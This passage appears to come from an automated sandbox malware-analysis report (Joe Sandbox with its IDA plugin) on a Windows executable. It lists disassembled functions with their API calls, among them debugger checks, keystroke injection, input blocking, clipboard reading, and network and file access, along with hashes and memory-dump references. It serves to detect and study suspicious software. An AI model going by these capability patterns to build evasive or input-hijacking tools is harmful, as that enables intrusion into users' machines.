                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                    • String ID: *.*$\VH
                                                                                                                    • API String ID: 2786137511-2657498754
                                                                                                                    • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                    • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                    • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                    • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                    Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                    • String ID: pqI
                                                                                                                    • API String ID: 2579439406-2459173057
                                                                                                                    • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                    • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                    • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                    • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                    Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                    • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsicollmouse_event
                                                                                                                    • String ID: DOWN
                                                                                                                    • API String ID: 1033544147-711622031
                                                                                                                    • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                    • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                    • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                    • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                    Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardMessagePostState$InputSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3031425849-0
                                                                                                                    • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                    • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                    • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                    • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                    Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4170576061-0
                                                                                                                    • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                    • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                    • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                    • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                    Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                    • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                    • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                    • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                    • IsIconic.USER32 ref: 0047A393
                                                                                                                    • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 292994002-0
                                                                                                                    • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                    • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                    • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                    • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                    Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                    • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                    • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                    • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                    • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                    • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                    Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 15083398-0
                                                                                                                    • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                    • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                    • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                    • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                    Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: U$\
                                                                                                                    • API String ID: 4104443479-100911408
                                                                                                                    • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                    • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                                    • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                    • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                                    Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3541575487-0
                                                                                                                    • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                    • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                    • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                    • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                    Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 48322524-0
                                                                                                                    • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                    • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                    • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                    • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                    Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 901099227-0
                                                                                                                    • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                                    • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                    • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                                    • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                    Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Proc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2346855178-0
                                                                                                                    • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                    • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                    • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                    • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                    Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BlockInput
                                                                                                                    • String ID:
